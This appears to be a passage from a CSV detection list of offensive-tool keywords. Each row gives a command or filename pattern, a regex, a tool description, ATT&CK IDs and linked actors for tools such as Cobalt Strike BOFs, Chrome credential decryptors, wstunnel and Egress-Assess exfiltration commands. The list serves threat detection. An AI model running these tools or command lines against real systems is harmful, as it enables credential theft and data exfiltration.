"* chimera.py *",".{0,1000}\schimera\.py\s.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","568"
"* chimera.sh*",".{0,1000}\schimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","569"
"* chimera_automation *.exe*",".{0,1000}\schimera_automation\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","570"
"* chrome logindata *",".{0,1000}\schrome\slogindata\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","571"
"* chrome masterkey *",".{0,1000}\schrome\smasterkey\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","572"
"* chrome_decrypt.cpp *",".{0,1000}\schrome_decrypt\.cpp\s.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","573"
"* chrome_decrypt.cpp*",".{0,1000}\schrome_decrypt\.cpp.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","574"
"* chrome_decrypt.exe*",".{0,1000}\schrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","575"
"* ChromeDump.ahk*",".{0,1000}\sChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","576"
"* chromepasswords.py*",".{0,1000}\schromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","577"
"* chromium_based_browsers.py*",".{0,1000}\schromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","579"
"* chromium_history.py*",".{0,1000}\schromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","580"
"* chromium_logins.py*",".{0,1000}\schromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","581"
"* cics-enum.nse*",".{0,1000}\scics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","582"
"* cics-info.nse*",".{0,1000}\scics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","583"
"* cics-user-brute.nse*",".{0,1000}\scics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","584"
"* cics-user-enum.nse*",".{0,1000}\scics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","585"
"* CIMplant.exe*",".{0,1000}\sCIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","586"
"* citrix-brute-xml.nse*",".{0,1000}\scitrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","587"
"* citrix-enum-apps.nse*",".{0,1000}\scitrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","588"
"* citrix-enum-apps-xml.nse*",".{0,1000}\scitrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","589"
"* citrix-enum-servers.nse*",".{0,1000}\scitrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","590"
"* citrix-enum-servers-xml.nse*",".{0,1000}\scitrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","591"
"* clamav-exec.nse*",".{0,1000}\sclamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","592"
"* cleantracks.ps1",".{0,1000}\scleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","593"
"* clear_logs.py*",".{0,1000}\sclear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","594"
"* --clear-obfscripts*",".{0,1000}\s\-\-clear\-obfscripts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","595"
"* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*",".{0,1000}\s\-client\sftp\s\-ip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Datatype\sssn\s\-Size\s.{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","596"
"* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*",".{0,1000}\s\-client\shttp\s\-ip\s.{0,1000}\s\-Datatype\scc\s\-Size\s.{0,1000}\s\-Port\s.{0,1000}\s\-Loop\s.{0,1000}\s\-Fast\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","597"
"* client --http-upgrade-path-prefix *wss*",".{0,1000}\sclient\s\-\-http\-upgrade\-path\-prefix\s.{0,1000}wss.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","598"
"* -client icmp -ip * -Datatype ssn -Report -Verbose*",".{0,1000}\s\-client\sicmp\s\-ip\s.{0,1000}\s\-Datatype\sssn\s\-Report\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","599"
"* client -L socks5://*",".{0,1000}\sclient\s\-L\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","600"
"* client -L stdio://* ws:/*",".{0,1000}\sclient\s\-L\sstdio\:\/\/.{0,1000}\sws\:\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","601"
"* client -L tcp://* wss://*",".{0,1000}\sclient\s\-L\stcp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","602"
"* client -L 'tproxy+tcp://* -L 'tproxy+udp://*",".{0,1000}\sclient\s\-L\s\'tproxy\+tcp\:\/\/.{0,1000}\s\-L\s\'tproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","603"
"* client -L 'udp://* wss://*",".{0,1000}\sclient\s\-L\s\'udp\:\/\/.{0,1000}\swss\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","604"
"* client -R 'tcp://[::]:*",".{0,1000}\sclient\s\-R\s\'tcp\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","605"
"* -client smb -ip * -Datatype *c:\*.* -Verbose*",".{0,1000}\s\-client\ssmb\s\-ip\s.{0,1000}\s\-Datatype\s.{0,1000}c\:\\.{0,1000}\..{0,1000}\s\-Verbose.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","606"
"* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*",".{0,1000}\s\-Client\sSMTPOutlook\s\-IP\s.{0,1000}\s\-NoPing\s\-DataType\s.{0,1000}ssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","607"
"* client.py -s http*:5000 --cert /*.pem*",".{0,1000}\sclient\.py\s\-s\shttp.{0,1000}\:5000\s\-\-cert\s\/.{0,1000}\.pem.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","608"
"* clipboard.ps1*",".{0,1000}\sclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","609"
"* clock-skew.nse*",".{0,1000}\sclock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","610"
"* Clone_Token /Process:* /Command:*",".{0,1000}\sClone_Token\s\/Process\:.{0,1000}\s\/Command\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","611"
"* Clones a security group while using an identical name and member list but can inject another user as well*",".{0,1000}\sClones\sa\ssecurity\sgroup\swhile\susing\san\sidentical\sname\sand\smember\slist\sbut\scan\sinject\sanother\suser\sas\swell.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","612"
"* cloud_enum.py*",".{0,1000}\scloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","613"
"* cloudsploit*",".{0,1000}\scloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","614"
"* CLR-Injection_x64.bat*",".{0,1000}\sCLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","615"
"* CLR-Injection_x86.bat*",".{0,1000}\sCLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","616"
